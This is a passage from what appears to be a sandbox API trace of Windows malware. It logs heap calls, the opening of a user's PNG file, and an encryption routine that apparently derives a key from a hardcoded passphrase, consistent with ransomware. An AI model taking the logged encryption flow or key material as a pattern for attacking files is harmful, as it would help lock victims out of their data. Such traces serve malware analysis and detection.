lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0093.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0093.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0093.403] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\bflIcpkmQtP.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\bflicpkmqtp.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0093.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0093.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0093.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0093.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0093.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0093.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0093.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0093.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0093.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0093.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0093.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0093.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0093.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0093.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0093.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0093.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0093.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0093.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0093.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0093.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0093.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0093.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0093.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0093.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0093.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0093.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0093.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0093.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0093.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0093.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0093.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0093.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0093.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0093.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0093.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0093.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0093.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0093.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0093.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0093.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0093.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0093.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0093.406] FreeLibrary (hLibModule=0x772d0000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0093.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0093.407] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0093.408] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.408] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0093.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0093.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0093.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0093.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0093.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0093.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0093.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0093.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0093.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0093.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0093.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0093.410] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca310, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0093.410] CloseHandle (hObject=0x258) returned 1 [0093.411] FreeLibrary (hLibModule=0x772d0000) returned 1 [0093.411] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0093.411] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\bflIcpkmQtP.png", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa782600, ftCreationTime.dwHighDateTime=0x1d5e4d7, ftLastAccessTime.dwLowDateTime=0x58d6c440, ftLastAccessTime.dwHighDateTime=0x1d5ee97, ftLastWriteTime.dwLowDateTime=0x58d6c440, ftLastWriteTime.dwHighDateTime=0x1d5ee97, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="bflIcpkmQtP.png", cAlternateFileName="BFLICP~1.PNG")) returned 0x41ac640 [0093.411] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0093.411] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0093.411] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.411] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0093.411] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.411] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0093.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ec8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0093.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0093.412] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0093.413] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0093.458] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0093.458] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0093.459] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0093.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.459] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0093.459] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.459] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0093.459] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cac58, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0093.459] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0093.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0093.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0093.459] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0093.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 